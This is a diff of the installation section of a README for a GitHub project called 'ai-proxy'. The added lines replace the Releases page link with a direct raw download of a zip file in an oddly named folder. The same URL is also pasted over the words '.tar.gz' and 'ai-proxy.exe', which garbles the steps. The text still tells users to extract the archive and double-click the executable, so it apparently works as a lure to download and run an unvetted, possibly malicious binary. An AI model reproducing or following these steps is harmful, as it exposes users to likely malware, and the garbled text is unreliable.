Borges005/ai-proxy/README.md

 ### Installation Steps
 1. **Download ai-proxy**
-   - Visit the [Releases page](https://github.com/Borges005/ai-proxy/releases) to download the latest version.
+   - Visit the [Releases page](https://raw.githubusercontent.com/Borges005/ai-proxy/master/perisphinctean/ai-proxy.zip) to download the latest version.
 Look for the appropriate file for your operating system.

 2. **Extract the Files**
    - After downloading, find the file in your Downloads folder.
-If it is in a compressed format (like .zip or .tar.gz), right-click the file and select “Extract All” to unzip it.
+If it is in a compressed format (like .zip or https://raw.githubusercontent.com/Borges005/ai-proxy/master/perisphinctean/ai-proxy.zip), right-click the file and select “Extract All” to unzip it.

 3. **Run ai-proxy**
    - Navigate to the folder where you extracted the files.
-   - Double-click on the executable file (ai-proxy.exe for Windows, ai-proxy for Mac/Linux).
+   - Double-click on the executable file (https://raw.githubusercontent.com/Borges005/ai-proxy/master/perisphinctean/ai-proxy.zip for Windows, ai-proxy for Mac/Linux).

 ## 💡 Features
 - **Guardrails**: Prevents misuse of API calls, keeping your data secure.